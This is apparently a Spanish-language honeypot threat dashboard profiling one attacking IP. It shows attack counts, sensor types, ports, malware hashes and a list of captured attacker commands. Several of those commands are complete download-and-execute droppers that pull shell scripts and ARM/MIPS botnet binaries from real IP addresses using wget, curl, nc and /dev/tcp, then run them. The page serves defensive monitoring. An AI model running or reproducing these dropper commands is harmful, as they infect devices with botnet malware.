Amenaza Activa • CRITICO

172.18.0.1

Pais de Origen

Primera Deteccion29/12/2025

Ultima Actividad22/2/2026

ISP-

🎯

11.447

Ataques Totales

🔌

Puertos

📡

Tipos Ataque

🦠

Malware

Geolocalizacion

Pais: -
Ciudad: Desconocida
ASN: -
ISP: -

Tipos de Ataque

sentrypeer

adbhoney

dionaea

miniprint

tanner

conpot

dicompot

Puertos Atacados

2180161445172318833306506055559100

Malware Asociado

0d3c687ffc30e185b836...→76ae6d577ba96b1c3a1d...→7a48c93c5cb63a09505a...→7a656791b445fff02ac6...→a1b6223a3ecb37b9f7e4...→

Comandos Ejecutados

$getprop1157x

$getprop ro.build.version.sdk360x

$tcpdump -D360x

$echo hello116x

cd /data/local/tmp/; busybox wget http://91.92.241.197:8080/bins/w.sh; sh w.sh; curl http://91.92.241.197:8080/bins/c.sh; sh c.sh; wget http://91.92.241.197:8080/bins/wget.sh; sh wget.sh; curl http://91.92.241.197:8080/bins/wget.sh; sh wget.sh; busybox wget http://91.92.241.197:8080/bins/wget.sh; sh wget.sh; busybox curl http://91.92.241.197:8080/bins/wget.sh; sh wget.sh

58x

cd /data/local/tmp 2>/dev/null || cd /tmp 2>/dev/null || cd /cache; rm -f parm7 parm5 parm6 parm; mkdir -p /data/local/tmp 2>/dev/null; (wget -q -O parm7 http://45.148.120.23/bins/parm7 2>/dev/null || busybox wget -q -O parm7 http://45.148.120.23/bins/parm7 2>/dev/null || curl -fsSL -o parm7 http://45.148.120.23/bins/parm7 2>/dev/null || nc 45.148.120.23 3338 > parm7 2>/dev/null || toybox nc 45.148.120.23 3338 > parm7 2>/dev/null || bash -c "cat < /dev/tcp/45.148.120.23/3338 > parm7" 2>/dev/null

45x

$echo "$(getprop ro.product.name 2>/dev/null) $(whoami 2>/dev/null)"31x

$pm path com.ufo.miner28x

cd /data/local/tmp/; busybox wget http://91.92.241.197:5124/2/w.sh; sh w.sh; curl http://91.92.241.197:5124/2/c.sh; sh c.sh; wget http://91.92.241.197:5124/2/wget.sh; sh wget.sh; curl http://91.92.241.197:5124/2/wget.sh; sh wget.sh; busybox wget http://91.92.241.197:5124/2/wget.sh; sh wget.sh; busybox curl http://91.92.241.197:5124/2/wget.sh; sh wget.sh

24x

cd /data/local/tmp/; wget http://130.12.180.78/manji.arm7 -O manji.arm7 || busybox wget http://130.12.180.78/manji.arm7 -O manji.arm7; chmod 777 manji.arm7; ./manji.arm7 || wget http://130.12.180.78/manji.mips -O manji.mips || busybox wget http://130.12.180.78/manji.mips -O manji.mips; chmod 777 manji.mips; ./manji.mips

11x

Evaluacion de Riesgo

/100

BajoMedioAltoCritico